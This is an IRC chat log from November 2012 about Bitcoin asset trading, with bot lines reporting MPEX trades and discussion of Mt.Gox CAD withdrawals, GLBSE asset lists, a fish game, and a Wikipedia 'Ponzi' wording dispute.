6.7061 BTC [+] Nov 22 17:20:21 [MPEX] [S.MPOE] 18978 @ 0.00050053 = 9.4991 BTC [-] Nov 22 17:20:22 [MPEX] [S.MPOE] 9372 @ 0.00049797 = 4.667 BTC [-] Nov 22 17:23:22 [MPEX] [S.MPOE] 25400 @ 0.00050804 = 12.9042 BTC [+] Nov 22 17:36:43 [MPEX] [S.MPOE] 6767 @ 0.00050695 = 3.4305 BTC [-] Nov 22 17:50:10 [MPEX] [S.MPOE] 15750 @ 0.00050695 = 7.9845 BTC [-] Nov 22 18:10:43 [MPEX] [S.MPOE] 11158 @ 0.00050547 = 5.64 BTC [-] Nov 22 18:10:44 [MPEX] [S.MPOE] 23042 @ 0.00049937 = 11.5065 BTC [-] Nov 22 18:16:43 [MPEX] [S.MPOE] 42645 @ 0.00050695 = 21.6189 BTC [+] Nov 22 18:19:46 [MPEX] [S.MPOE] 23258 @ 0.00049937 = 11.6143 BTC [-] Nov 22 18:19:48 [MPEX] [S.MPOE] 26428 @ 0.00049797 = 13.1604 BTC [-] Nov 22 18:19:49 [MPEX] [S.MPOE] 1514 @ 0.00049694 = 0.7524 BTC [-] Nov 22 18:26:25 [MPEX] [S.MPOE] 9386 @ 0.00049694 = 4.6643 BTC [-] Nov 22 18:26:29 [MPEX] [S.MPOE] 6349 @ 0.00049672 = 3.1537 BTC [-] Nov 22 18:26:31 woah Nov 22 18:26:34 whats with all the trades? Nov 22 18:26:58 trades. happen. Nov 22 18:27:06 just seemed like alot this morning Nov 22 18:28:56 mircea is trading with himself :P Nov 22 18:29:22 where did i saw that? yeah on reddit... Nov 22 18:29:51 but the 1.8m wall yesterday was really impressive Nov 22 18:30:14 [MPEX] [S.MPOE] 8304 @ 0.00050695 = 4.2097 BTC [+] Nov 22 18:30:15 [MPEX] [S.MPOE] 7434 @ 0.00050804 = 3.7768 BTC [+] Nov 22 18:33:11 [MPEX] [S.MPOE] 14111 @ 0.00050804 = 7.169 BTC [+] Nov 22 18:33:12 [MPEX] [S.MPOE] 781 @ 0.00050846 = 0.3971 BTC [+] Nov 22 18:40:01 [MPEX] [S.MPOE] 20896 @ 0.00050846 = 10.6248 BTC [+] Nov 22 18:41:04 [MPEX] [S.MPOE] 32133 @ 0.00050846 = 16.3383 BTC [+] Nov 22 18:41:06 [MPEX] [S.MPOE] 17717 @ 0.00051 = 9.0357 BTC [+] Nov 22 18:41:14 pity that my scalper needs update to use latest code. would have made a killing :P Nov 22 18:48:35 [MPEX] [S.MPOE] 32604 @ 0.00051 = 16.628 BTC [+] Nov 22 18:54:16 well the 2mn wall you mean. and that was me. Nov 22 18:54:30 and i'm not going to keep seling my own shares jsut because people keep wanting to buy them ;/ Nov 22 18:56:38 [MPEX] [S.MPOE] 91270 @ 0.00051 = 46.5477 BTC [+] Nov 22 18:58:59 04:57 #bitcoin-assets: < sgornick> smickles: How long after 1 confirmation before the credit shows? << should be just about _at_ one confirm to show Nov 22 18:59:18 goatse, lol Nov 22 19:00:05 ahaha dtng survives Nov 22 19:00:07 but mpex is gone Nov 22 19:00:25 i'm at .096 Nov 22 19:00:31 only just invisible Nov 22 19:01:31 heh, freemoney's fish is finally there Nov 22 19:02:33 [MPEX] [S.MPOE] 44900 @ 0.00051 = 22.899 BTC [+] Nov 22 19:06:06 [MPEX] [S.MPOE] 32450 @ 0.00051 = 16.5495 BTC [+] Nov 22 19:09:00 lol, i just witnessed the death of Nameworld Nov 22 19:10:22 you be all swimmin with the fishes. Nov 22 19:12:54 [MPEX] [S.MPOE] 32400 @ 0.00051 = 16.524 BTC [+] Nov 22 19:13:03 lol, i just witnessed the death of Nameworld Nov 22 19:20:13 [MPEX] [S.MPOE] 41950 @ 0.00051 = 21.3945 BTC [+] Nov 22 19:25:42 [MPEX] [S.MPOE] 33900 @ 0.00051 = 17.289 BTC [+] Nov 22 19:36:33 [MPEX] [S.MPOE] 31800 @ 0.00051 = 16.218 BTC [+] Nov 22 19:45:02 [MPEX] [S.MPOE] 29600 @ 0.00050884 = 15.0617 BTC [-] Nov 22 19:48:43 [MPEX] [S.MPOE] 23072 @ 0.00051 = 11.7667 BTC [+] Nov 22 20:00:59 [MPEX] [S.MPOE] 21600 @ 0.00050884 = 10.9909 BTC [-] Nov 22 20:04:17 look, there's a bitcointalk.org fish now Nov 22 20:05:14 lol Nov 22 20:05:32 MY ARTICLE MADE HIM!!!1 Nov 22 20:05:49 lol, one of your commenters? Nov 22 20:06:02 From: "Erik Voorhees" I will never forgive you for eating my fish!!!!! Nov 22 20:06:13 lol Nov 22 20:06:15 hehehe Nov 22 20:07:52 I'm back in the game... Nov 22 20:07:53 lol, "jaws" is blockchain.info Nov 22 20:08:17 I only put 0.10 so people register fishes under my name. Nov 22 20:08:22 and keep it there Nov 22 20:08:30 Apparently it works. Nov 22 20:08:45 Namjies: well, until your ally takes a hit Nov 22 20:08:46 Because I died. Nov 22 20:08:55 Yeah Nov 22 20:08:56 [MPEX] [S.MPOE] 1700 @ 0.00050884 = 0.865 BTC [-] Nov 22 20:08:57 [MPEX] [S.MPOE] 28400 @ 0.00050652 = 14.3852 BTC [-] Nov 22 20:08:59 [MPEX] [S.MPOE] 3600 @ 0.00050633 = 1.8228 BTC [-] Nov 22 20:14:39 [MPEX] [S.MPOE] 6750 @ 0.00050633 = 3.4177 BTC [-] Nov 22 20:17:36 ohsht, bitcointalk just ate a newb! Nov 22 20:17:36 and then got pwnd by svost Nov 22 20:18:54 [MPEX] [S.MPOE] 6700 @ 0.00050633 = 3.3924 BTC [-] Nov 22 20:19:54 mwaghaga a cool 10 btc profit for me. Nov 22 20:19:58 pi.uk is DEAD Nov 22 20:21:17 10 btc from the fish?! Nov 22 20:21:49 mhm. Nov 22 20:21:55 i ate a few ppl. Nov 22 20:22:39 You keep eating them Nov 22 20:23:06 You're definitly lucky Nov 22 20:23:49 While you guys play, I'm going to refer more people to Seals with Clubs. Nov 22 20:24:01 Thank you for your help to test the game. Withdraw your funds plz and PM me with found bugs. If some bitcoins wasn't deposited then PM me with your tx id. Nov 22 20:24:05 https://bitcointalk.org/index.php?topic=127159.msg1351741#msg1351741 Nov 22 20:24:31 aw :( Nov 22 20:25:00 He should just force withdrawals on all fishes... Nov 22 20:25:12 I'm sure many won't see that. Nov 22 20:27:43 I killed myself on you smickles. Withdraw now =P Nov 22 20:29:30 hahah! Nov 22 20:30:18 [MPEX] [S.MPOE] 24500 @ 0.00051 = 12.495 BTC [+] Nov 22 20:31:37 Hmm... I can't wait to organize a freeroll on Seals. Nov 22 20:33:28 [MPEX] [S.MPOE] 21812 @ 0.00050633 = 11.0441 BTC [-] Nov 22 20:37:37 https://bitcointalk.org/index.php?topic=127312.0 Nov 22 20:37:39 ok, this is a bomb. Nov 22 20:40:51 It's... boring... Nov 22 20:41:02 So they don't currently have enough CAD. So what? Nov 22 20:41:37 i'll tell you so what. how can't they not ? Nov 22 20:41:42 how can they* Nov 22 20:41:59 they have to exchange to cad Nov 22 20:42:27 if you write a mtgox bot, you'll know they have a strange system Nov 22 20:42:52 you can buy usd, and they pair you with a cad seller, and run to their bank to get the usd Nov 22 20:43:12 smickles listen, i have usd, ron and eur accounts Nov 22 20:43:13 [MPEX] [S.MPOE] 30788 @ 0.00050481 = 15.5421 BTC [-] Nov 22 20:43:14 [MPEX] [S.MPOE] 15062 @ 0.00051 = 7.6816 BTC [+] Nov 22 20:43:36 do you know what it takes to pay back usd on an eur intake ? Nov 22 20:43:38 5 seconds. Nov 22 20:44:22 It wouldn't take me 5 seconds. Nov 22 20:45:04 Imagine I have a USD bank account and a CAD bank account. I have to transfer funds to one another and wait a few days for conversion & transfer to happen. Nov 22 20:45:43 Namijes, did you saw the ticket date there? Nov 22 20:45:51 DAYS ?! Nov 22 20:46:06 man seriously, it is five seconds, i just make the order. Nov 22 20:46:18 it takes me longer to authorise it than it takes the bank to execute it. Nov 22 20:47:08 [MPEX] [S.MPOE] 21691 @ 0.00051 = 11.0624 BTC [+] Nov 22 20:47:55 basically the only explanation i can see is that they are literally out of money Nov 22 20:48:02 and are trying to conserve cash as best they can Nov 22 20:48:12 first by the entire dwolla bs, on the grounds that people know dwolla are assholla Nov 22 20:48:18 What? Nov 22 20:48:24 now with cad, on the theory that "nobody cares about cad" Nov 22 20:48:25 and so on Nov 22 20:48:53 Namjies : what do youi mean what ? you can't be out of fiat. if you have one you have any. Nov 22 20:49:52 I've never seen instant processing of wire transfers. Nov 22 20:50:05 Namjies: you poor is showing Nov 22 20:50:08 ;) Nov 22 20:50:30 Namjies why are we discussing wires ? we're discussing exchanging usd to cad or w/e Nov 22 20:50:53 heh, i don't know anything :o Nov 22 20:51:19 Namjies, even if they had some administrative issues to move funds to CAD acct, it's not possible it would take a month Nov 22 20:51:25 BECAUSE they'd have to transfer from a USD account and wire funds to their CAD account... Nov 22 20:51:40 Yes, it would not take a month. It would still not be instant. Nov 22 20:52:12 and before all they plainly say "no funds" so i guess no wire transfer was even intended Nov 22 20:53:09 you don't wire funds from your usd to your cad account. Nov 22 20:53:26 it's instant, you just move them from your own usd account to your own cad account. Nov 22 20:53:28 don't you just ask the bank to exchane it? Nov 22 20:53:32 exactly. Nov 22 20:53:46 ofc, if they're in the same bank.. but that's beside the point for this situation Nov 22 20:53:47 or your concierge Nov 22 20:53:49 basically, that's a "we're broke" statement. Nov 22 20:53:58 jurov : what do you mean besides the point ? Nov 22 20:53:59 exactly Nov 22 20:54:02 they claim to not have cad. Nov 22 20:54:06 That's assuming you have a single account at a single bank offering balances in all the currencies you want. Nov 22 20:54:10 this means "we have no money". period. Nov 22 20:54:19 They might have different banks for each currency. Nov 22 20:54:23 Namjies if you don't you have no business offering this service. Nov 22 20:54:36 if i hail a cam i assume it has gas in the tank. Nov 22 20:54:43 cam => cab. Nov 22 20:54:47 lol, my local credit union will give me yen if i ask Nov 22 20:54:52 [MPEX] [S.MPOE] 28937 @ 0.00050313 = 14.5591 BTC [-] Nov 22 20:54:59 i bought ryals once just for the hell of it. Nov 22 20:55:02 "beside the point" i mean they don't even mention bank wires or like Nov 22 20:55:06 a right. Nov 22 20:55:23 They'll let you buy the currency, yes. Nov 22 20:55:44 They might not allow you to have an account denomited in that currency however. Nov 22 20:56:01 [MPEX] [S.MPOE] 18650 @ 0.00050313 = 9.3834 BTC [-] Nov 22 20:56:14 if that's the case, they need a better bank Nov 22 20:57:21 OR considering the fee they take on BTC transactions, they might not be interested to convert USD to CAD and get hit by conversion fees for someone withdrawing 100 CAD or so. Nov 22 20:58:20 then...they...don't...offer...the...service Nov 22 20:58:21 wtf. Nov 22 20:58:28 All would be bad business practice, yes. Nov 22 20:58:57 it *is* bad business practice.. let the customer wait a month? Nov 22 20:59:07 [MPEX] [S.MPOE] 13800 @ 0.00051 = 7.038 BTC [+] Nov 22 20:59:09 anyway, when i said "buy ryals" i didn't mean get some banknotes (i'm not even sure i could have) Nov 22 20:59:16 i meant, exchange this 450k usd to ryals. Nov 22 21:00:13 Hmm Nov 22 21:00:42 Well if I ever need to do something like that, I'll inquire about it. Nov 22 21:01:00 I don't usually inquire about services I don't need. Nov 22 21:01:03 hopefully you'd inquire before you run mtgox for 2 years Nov 22 21:01:52 [MPEX] [S.MPOE] 3113 @ 0.00050313 = 1.5662 BTC [-] Nov 22 21:01:53 [MPEX] [S.MPOE] 19837 @ 0.00050225 = 9.9631 BTC [-] Nov 22 21:02:11 live.coinbr.com << was this always so animated ? Nov 22 21:02:25 looks like someone's having a heart attack. Nov 22 21:03:06 fuck Nov 22 21:03:21 i started to talk about bitcoin on forex irc network Nov 22 21:03:22 20:02.11 ( @JohnnyM ) kakobrekla: plug me into the matrix so you can download all this knowledge into my head lol Nov 22 21:03:44 lol cool. Nov 22 21:04:03 ha Nov 22 21:09:52 [MPEX] [S.MPOE] 40392 @ 0.00050225 = 20.2869 BTC [-] Nov 22 21:13:26 Why are those aggregated bid/asks cutting so abruptly into flat-tops? Nov 22 21:13:57 so Mr. Nefarious has started giving out asset lists? Nov 22 21:13:59 It's like even up to the last point, plenty of small step and suddenly... almost no orders Nov 22 21:14:09 Quite a brutal break Nov 22 21:14:26 Ukto: yes, he has Nov 22 21:14:57 [MPEX] [S.MPOE] 3210 @ 0.00050225 = 1.6122 BTC [-] Nov 22 21:14:59 [MPEX] [S.MPOE] 16950 @ 0.00050014 = 8.4774 BTC [-] Nov 22 21:15:00 [MPEX] [S.MPOE] 18890 @ 0.00049931 = 9.432 BTC [-] Nov 22 21:15:03 know who else besides gigavps that have received the info? Nov 22 21:15:10 I have Nov 22 21:15:15 for BTC-MINING Nov 22 21:15:30 no BTC-BOND/KRAKEN thus far. Nov 22 21:16:04 Namjies: which asset is yours? Nov 22 21:17:25 Ukto: http://blog.glbse.com/issers-who-have-been-given-lists-so-far Nov 22 21:17:36 ahh, thanks pigeons. Nov 22 21:18:08 IBB before s2cm, your joking Nov 22 21:18:34 yeah, I was just noticing that myself Nov 22 21:18:51 i mean, s2cm wasn't all that big, but ibb was tiny Nov 22 21:19:20 I expected to see some others before IBB Nov 22 21:19:24 but mebbe its cause its small Nov 22 21:19:36 well ibb is also one of the oldest still running Nov 22 21:19:39 Ukto: he claimed to be going from largest to smallest Nov 22 21:20:35 pigeons: well, I am about to turn my system on. gonna add api trading tonight/tomorrow. Nov 22 21:20:49 his tagline is pissing me off Nov 22 21:20:54 Ukto: url? Nov 22 21:21:03 all the tests have been great Nov 22 21:21:08 pigeons: you have an account. LOL Nov 22 21:21:10 "long time member of the bitcoin community" Nov 22 21:21:15 not anymore jackass Nov 22 21:21:21 pigeons: http://www.bitfunder.com Nov 22 21:21:22 :P Nov 22 21:21:26 thanks Nov 22 21:21:32 its in test mode, so no deposits, or withdraws atm Nov 22 21:21:41 wouldnt want someone to accidentally "donate" ;) Nov 22 21:21:43 Ukto: a p2p lending site? Nov 22 21:21:54 or exchange sort? Nov 22 21:21:57 ok, when i tested it was under hashpower downain Nov 22 21:21:58 nah, almost a literal glbse clone Nov 22 21:22:03 ah Nov 22 21:22:05 but adding more features, and a nicer interface Nov 22 21:22:09 while easily recognizable Nov 22 21:22:28 nice TOS Nov 22 21:22:38 this is bitcoin. any tos other than that is a lie Nov 22 21:22:55 i hate all the ppl who write all the proper crap, and it turns out to be bs Nov 22 21:23:27 I have been handling lots of btc for quite a few ppl for a while now, and am heavily invested, I dont plan to run away anytime w/ anything. Nov 22 21:23:31 I like the community. heh Nov 22 21:23:41 well, most of it Nov 22 21:23:42 :P Nov 22 21:23:49 [MPEX] [S.MPOE] 8800 @ 0.00050276 = 4.4243 BTC [+] Nov 22 21:24:07 I have an asset list import system && claim system based on the way info was presented to Goat a few months ago Nov 22 21:24:18 havent seen the new list stuff yet to make sure its the same Nov 22 21:25:15 giga said its csv with email, #shares held, btc address provided, Nov 22 21:28:34 Hah, much shorter than my TOS Nov 22 21:28:39 http://www.namworld.net/tos Nov 22 21:28:47 Not really the same area... Nov 22 21:29:28 [MPEX] [S.MPOE] 21050 @ 0.00050881 = 10.7105 BTC [+] Nov 22 21:34:13 [MPEX] [S.MPOE] 16158 @ 0.00050881 = 8.2214 BTC [+] Nov 22 21:34:14 [MPEX] [S.MPOE] 14359 @ 0.00051 = 7.3231 BTC [+] Nov 22 21:34:51 [MPEX] [S.MPOE] 4400 @ 0.00050292 = 2.2128 BTC [-] Nov 22 21:36:54 [MPEX] [S.MPOE] 49691 @ 0.00051 = 25.3424 BTC [+] Nov 22 21:38:57 [MPEX] [S.MPOE] 32400 @ 0.00050292 = 16.2946 BTC [-] Nov 22 21:38:57 [MPEX] [S.MPOE] 6577 @ 0.00049931 = 3.284 BTC [-] Nov 22 21:40:58 [MPEX] [S.MPOE] 32579 @ 0.00051 = 16.6153 BTC [+] Nov 22 21:56:00 [MPEX] [S.MPOE] 17200 @ 0.00049931 = 8.5881 BTC [-] Nov 22 21:58:57 [MPEX] [S.MPOE] 254 @ 0.00049931 = 0.1268 BTC [-] Nov 22 21:58:58 [MPEX] [S.MPOE] 25846 @ 0.00049891 = 12.8948 BTC [-] Nov 22 22:00:41 ;;calc .5 * [ticker --last] Nov 22 22:00:42 6.048995 Nov 22 22:02:55 [MPEX] [S.MPOE] 8654 @ 0.00049891 = 4.3176 BTC [-] Nov 22 22:02:57 [MPEX] [S.MPOE] 12846 @ 0.00049888 = 6.4086 BTC [-] Nov 22 22:12:31 [MPEX] [S.MPOE] 13800 @ 0.00051 = 7.038 BTC [+] Nov 22 22:15:45 [MPEX] [S.MPOE] 20000 @ 0.00051 = 10.2 BTC [+] Nov 22 22:23:16 [MPEX] [S.MPOE] 24511 @ 0.00050595 = 12.4013 BTC [-] Nov 22 22:23:17 [MPEX] [S.MPOE] 21839 @ 0.00050351 = 10.9962 BTC [-] Nov 22 22:26:59 [MPEX] [S.MPOE] 25161 @ 0.00050351 = 12.6688 BTC [-] Nov 22 22:34:50 [MPEX] [S.MPOE] 24754 @ 0.00049888 = 12.3493 BTC [-] Nov 22 22:34:51 [MPEX] [S.MPOE] 14896 @ 0.00049862 = 7.4274 BTC [-] Nov 22 22:35:44 [MPEX] [S.MPOE] 29350 @ 0.00049862 = 14.6345 BTC [-] Nov 22 22:40:01 [MPEX] [S.MPOE] 7854 @ 0.00049862 = 3.9162 BTC [-] Nov 22 22:40:03 [MPEX] [S.MPOE] 15150 @ 0.00049711 = 7.5312 BTC [-] Nov 22 22:40:04 [MPEX] [S.MPOE] 25901 @ 0.00049672 = 12.8655 BTC [-] Nov 22 22:40:05 [MPEX] [S.MPOE] 10395 @ 0.00049659 = 5.1621 BTC [-] Nov 22 22:47:51 [MPEX] [S.MPOE] 29182 @ 0.00049913 = 14.5656 BTC [+] Nov 22 22:47:53 [MPEX] [S.MPOE] 2455 @ 0.00049659 = 1.2191 BTC [-] Nov 22 22:58:15 [MPEX] [S.MPOE] 15639 @ 0.00049965 = 7.814 BTC [+] Nov 22 22:58:17 [MPEX] [S.MPOE] 15811 @ 0.00051 = 8.0636 BTC [+] Nov 22 23:00:50 [MPEX] [S.MPOE] 50550 @ 0.00051 = 25.7805 BTC [+] Nov 22 23:19:17 [MPEX] [S.MPOE] 33285 @ 0.00051 = 16.9754 BTC [+] Nov 22 23:20:49 [MPEX] [S.MPOE] 18100 @ 0.00050994 = 9.2299 BTC [-] Nov 22 23:25:15 [MPEX] [S.MPOE] 11600 @ 0.00050994 = 5.9153 BTC [-] Nov 22 23:33:47 [MPEX] [S.MPOE] 44540 @ 0.00051 = 22.7154 BTC [+] Nov 22 23:36:41 [MPEX] [S.MPOE] 11700 @ 0.00051 = 5.967 BTC [+] Nov 22 23:38:32 [MPEX] [S.MPOE] 44842 @ 0.00051 = 22.8694 BTC [+] Nov 22 23:41:39 [MPEX] [S.MPOE] 49600 @ 0.00051 = 25.296 BTC [+] Nov 22 23:57:46 [MPEX] [S.MPOE] 17623 @ 0.00051 = 8.9877 BTC [+] Nov 23 00:01:36 http://blog.smickles.com/bitcoin/the-ponzi-of-wikipedia-and-bitcoin/#update_22nov12 << Even though mircea_popescu disagrees, I know some of you care ;) Nov 23 00:06:08 smickles: good that it got removed Nov 23 00:06:41 What? It was only truths! Nov 23 00:06:47 lol Nov 23 00:06:52 People have indeed accused bitcoins of being a ponzi. Nov 23 00:07:19 That section didn't state if that was right or no, just that some people claimed so. Nov 23 00:07:20 Namjies: source? Nov 23 00:07:37 There was a few linked articles. Nov 23 00:07:42 Now they got removed. Nov 23 00:07:45 and don't link to a source saying that people say it has been accused of being a ponzi Nov 23 00:07:49 Namjies: that kind of thing is stupid to have on an article lol Nov 23 00:07:57 on that basis I accuse the US president of being a prostitute Nov 23 00:07:59 TO WIKIPEDIA Nov 23 00:08:04 I know, I know. Nov 23 00:08:08 xD Nov 23 00:08:26 lol, Namjies those refrences never said who accused it of being a ponzi Nov 23 00:08:31 yea, wikipedia is meant to be about facts :p Nov 23 00:08:38 not even so low as some forum nick Nov 23 00:09:02 it was essentially hearsay Nov 23 00:09:12 (did i spell that correctly?) Nov 23 00:09:12 Yeah, well just make sure your name is in the news as a crazy nutjob claiming the president is a prostitute. Nov 23 00:09:24 :D Nov 23 00:09:35 Once it's quoted in reputable newspapers, we can add a section on wikipedia. Nov 23 00:10:36 heh, they don't usually give the names of people saying baseless things Nov 23 00:10:38 "Name has blocked bridge/shot people/other claiming the President is a prostitute. The incident... President's reaction..." Nov 23 00:10:47 isn't that part of the point in haveing it removed? Nov 23 00:10:53 I said make sure your name is in the news. Nov 23 00:10:59 noone reputable actually accused bitcoin of being a ponzi Nov 23 00:11:19 [MPEX] [S.MPOE] 30750 @ 0.00051 = 15.6825 BTC [+] Nov 23 00:11:34 You can get something included in wikipedia anyway by creating a large commotion worth mentioning. Nov 23 00:11:35 reputable institutions said that someone heard it said that... Nov 23 00:12:11 So long as that incident is big enough. Nov 23 00:12:30 https://bitcointalk.org/index.php?topic=127096.0 Oh, by the way, i'm suprised i wasn't mentioned here, and mircea_popescu was edited out Nov 23 00:12:47 And whatever you were screaming/saying could very well end up quoted in a wikipedia article. Nov 23 00:13:06 As it's a relevant information to the fact (the "incident") Nov 23 00:13:22 You have to think around the limitations. Nov 23 00:13:46 Namjies: do you think the original statement implied that it actually is a ponzi? Nov 23 00:14:24 No. But I know that's not how the general public would read it. Nov 23 00:15:42 "Some criticize Bitcoin for being a [[Ponzi scheme]]..." Nov 23 00:15:58 I don't quite se how that doesn't imply it is a ponzi Nov 23 00:16:17 it basically says, it's a ponzi, and some criticize it b/c of that Nov 23 00:17:22 It just says some people think it is a Ponzi. Nov 23 00:18:40 that would be "Some criticize Bitcoin, claiming it is a [[Ponzi scheme]].." tho Nov 23 00:19:01 [MPEX] [S.MPOE] 4009 @ 0.00050994 = 2.0443 BTC [-] Nov 23 00:19:01 [MPEX] [S.MPOE] 38300 @ 0.00050873 = 19.4844 BTC [-] Nov 23 00:19:03 [MPEX] [S.MPOE] 7841 @ 0.00050853 = 3.9874 BTC [-] Nov 23 00:19:22 "some criticize smickles for being a human" Nov 23 00:19:37 When you criticize something for being X, X is not necessarily proven. Nov 23 00:20:20 "some criticize smickles for being a douche" The point is not proven but someone is criticizing you for it. Nov 23 00:20:56 google says it's "Indicate the faults of (someone or something) in a disapproving way", and fault as "An unattractive or unsatisfactory feature", that sound to me as if it was something that is proven Nov 23 00:21:31 Or criticize can simply mean you judged something to be X based on what you see. Nov 23 00:21:36 yes, i parse such sentence like they're criticizing known fact Nov 23 00:22:08 anywah, that's the crux of the debate Nov 23 00:22:09 then i have to retrace anf think maybe it's not a fact, jsut assumption Nov 23 00:22:17 [MPEX] [S.MPOE] 28200 @ 0.00051 = 14.382 BTC [+] Nov 23 00:22:35 "We'll proceed this way, it works because" -> "This cannot possibly work because" Nov 23 00:22:50 "some criticized the plan as being impossible" Nov 23 00:23:29 or for being impossible. Nov 23 00:24:01 Perfectly valid usage, yet it doesn't prove what you criticize is true. Nov 23 00:24:20 You can criticize anything for being anything. Nov 23 00:24:27 id doesn't proves, just implies Nov 23 00:24:34 *it Nov 23 00:24:54 implication that can be pretty damning, too Nov 23 00:24:58 It implies the person who criticize it believes it's a fact/fault Nov 23 00:26:08 "Some people criticize the US government for not being a democracy" <-- Nov 23 00:26:37 The person criticizing implies something, but it's not a proven fact. Nov 23 00:26:53 lol, it is a republic tho Nov 23 00:27:38 I would have read it as being a Ponzi if they said the owner/administrator admitted it was a ponzi and could link to articles/investigation/reports/etc quoting/claiming so. Nov 23 00:27:39 Namjies, yeah, but i wouldn't rely on that in election campaign, for example :p Nov 23 00:28:26 there's thorretical semantics and there's practice Nov 23 00:28:41 and I don't rely on someone criticizing something as a Ponzi to be a proof it is... Nov 23 00:29:09 so I didn't read the statement as saying Bitcoin was a Ponzi. Nov 23 00:29:22 But yes, it was not worth the mention on wikipedia. Nov 23 00:40:32 [MPEX] [S.MPOE] 19800 @ 0.00050853 = 10.0689 BTC [-] Nov 23 00:47:37 [MPEX] [S.MPOE] 5800 @ 0.00051 = 2.958 BTC [+] Nov 23 00:52:54 [MPEX] [S.MPOE] 26950 @ 0.00051 = 13.7445 BTC [+] Nov 23 00:54:21 [MPEX] [S.MPOE] 51100 @ 0.00051 = 26.061 BTC [+] Nov 23 00:57:32 [MPEX] [S.MPOE] 5900 @ 0.00051 = 3.009 BTC [+] Nov 23 01:04:38 [MPEX] [S.MPOE] 25655 @ 0.00051 = 13.0841 BTC [+] Nov 23 01:08:50 [MPEX] [S.MPOE] 40100 @ 0.00051 = 20.451 BTC [+] Nov 23 01:14:44 oooh, Namjies Sudoghost commented on my article Nov 23 01:14:54 http://blog.smickles.com/bitcoin/the-ponzi-of-wikipedia-and-bitcoin/#comment-6 Nov 23 01:18:44 [MPEX] [S.MPOE] 29300 @ 0.00051 = 14.943 BTC [+] Nov 23 01:20:51 [MPEX] [S.MPOE] 24171 @ 0.00050853 = 12.2917 BTC [-] Nov 23 01:20:53 [MPEX] [S.MPOE] 4479 @ 0.00050698 = 2.2708 BTC [-] Nov 23 01:21:13 Go Sudoghost! Nov 23 01:21:50 If the tidbit was reworded to "has been accused of", I'd be quite fine with it. Nov 23 01:27:01 [MPEX] [S.MPOE] 26799 @ 0.00050698 = 13.5866 BTC [-] Nov 23 01:37:20 [MPEX] [S.MPOE] 8188 @ 0.00050817 = 4.1609 BTC [+] Nov 23 01:37:21 [MPEX] [S.MPOE] 25720 @ 0.00051 = 13.1172 BTC [+] Nov 23 01:40:19 I'm actually a little suprised that sudoghost say my blog, that page has only had 170 views, and that's about half as many as the biggest fish page has had Nov 23 01:40:29 s/say/saw/ Nov 23 01:40:42 [MPEX] [S.MPOE] 32801 @ 0.00050698 = 16.6295 BTC [-] Nov 23 01:40:44 [MPEX] [S.MPOE] 18029 @ 0.00050667 = 9.1348 BTC [-] Nov 23 01:48:12 lord smickles! Nov 23 01:49:38 My pleb, thestringpuller Nov 23 01:50:21 [MPEX] [S.MPOE] 5571 @ 0.00050667 = 2.8227 BTC [-] Nov 23 01:50:23 [MPEX] [S.MPOE] 35629 @ 0.00050438 = 17.9706 BTC [-] Nov 23 01:50:35 it has begun Nov 23 01:50:43 ;;halfreward Nov 23 01:50:43 Estimated time of bitcoin block reward halving: Thu Nov 29 02:40:44 2012 UTC | Time remaining: 6 days, 2 hours, 50 minutes, and 0 seconds. Nov 23 01:50:52 the final week Nov 23 01:51:21 i couldnt get online in time last night to get the calls Nov 23 01:51:29 You still expect the exghange rate to go apeshit here sooN? Nov 23 01:51:48 aw, too bad Nov 23 01:52:08 if you trust icbit, there are still futures pretty low Nov 23 01:53:29 i don't trust icbit based on your affidavit Nov 23 01:53:34 I spelled that rong Nov 23 01:53:35 ;;ticker --last Nov 23 01:53:35 12.31000 Nov 23 01:53:39 ;;bc,24hprc Nov 23 01:53:40 12.01 Nov 23 01:53:46 Ugh christmas time again Nov 23 01:53:49 and that's still 30 cents away Nov 23 01:53:52 I'm starting to hate christmas Nov 23 01:54:06 heh, what's christmas? Nov 23 01:54:57 I finally got my wife to stop acting like a drunk person (bringing a whole tree into the house) Nov 23 01:55:46 UGH and hitman absolution is out? Nov 23 01:55:48 dude Nov 23 01:55:51 I need a time machine Nov 23 01:58:15 lol, timesink, that one should be Nov 23 02:00:55 i should stop watching iron chef and start coding Nov 23 02:01:10 [MPEX] [S.MPOE] 1021 @ 0.00050438 = 0.515 BTC [-] Nov 23 02:01:12 [MPEX] [S.MPOE] 17879 @ 0.00050336 = 8.9996 BTC [-] Nov 23 02:06:24 lets ruthless take over mpex Nov 23 02:06:25 jkjk Nov 23 02:08:04 [MPEX] [S.MPOE] 123638 @ 0.00051 = 63.0554 BTC [+] Nov 23 02:08:36 mircea_popescu: You've been entirely left out here: http://bitcoinmagazine.net/bitfinex-bitcoinica-rises-from-the-grave/ Nov 23 02:11:37 https://bitcointalk.org/index.php?topic=127096.0 Oh, by the way, i'm suprised i wasn't mentioned here, and mircea_popescu was edited out << lmao i was in there ?! Nov 23 02:12:06 yeah, I didn't look into it far enough to find out why you were redacted Nov 23 02:12:34 smickles you wouldn't expect bitcoin magazine to make sense would you. Nov 23 02:13:02 but the explanation is quite simple : everyone left. the only guy left is some schmuck from Ro by the name of mihai something Nov 23 02:14:37 who's butthurt cause he was kinda told to pack it here http://trilema.com/2012/ciuciu-bond/#comment-87615 Nov 23 02:19:16 usagi defrauded us Nov 23 02:20:56 [MPEX] [S.MPOE] 23600 @ 0.00050893 = 12.0107 BTC [-] Nov 23 02:20:58 [MPEX] [S.MPOE] 18250 @ 0.00050781 = 9.2675 BTC [-] Nov 23 02:22:57 EskimoBob defrauded me, he lied that he owend one share of something usagi had, and usagi the honaorable said he didn't, so by some way i haven't figured out yet, bob scammed me Nov 23 02:23:44 what's a honaor Nov 23 02:24:34 you invested in nyan.a popescu? Nov 23 02:24:36 oh sorry, should be "the honorable usagi" Nov 23 02:25:51 thestringpuller were 100 btc of mpcd series Nov 23 02:26:35 what was the mpcd series? I am still uninformed, I apologize. Nov 23 02:27:06 it was an attempt to create a CDO series Nov 23 02:27:14 it's on the forum somewhwere, i think if you search for mpcd it'll pop Nov 23 02:27:27 mircea_popescu issued cdoish things invested into such top rated securites as usagi's issues and patrick harnett Nov 23 02:28:16 and they both defaulted? Nov 23 02:28:28 interesting how that works innit. Nov 23 02:28:34 well at the very least, they both stopped paying Nov 23 02:37:33 http://www.reddit.com/r/Bitcoin/comments/13n7dn/bitcoin_magazine_leaves_out_a_crucial_detail/ Nov 23 02:37:49 :D Nov 23 02:42:01 http://trilema.com/2012/the-biggest-fish-revisited/ Nov 23 02:42:02 there. Nov 23 02:42:53 smickles what's worth mentioning is that mpoe actually existed one week before bitcoinica. Nov 23 02:46:01 mircea_popescu: oh yeah Nov 23 02:53:06 mircea_popescu: 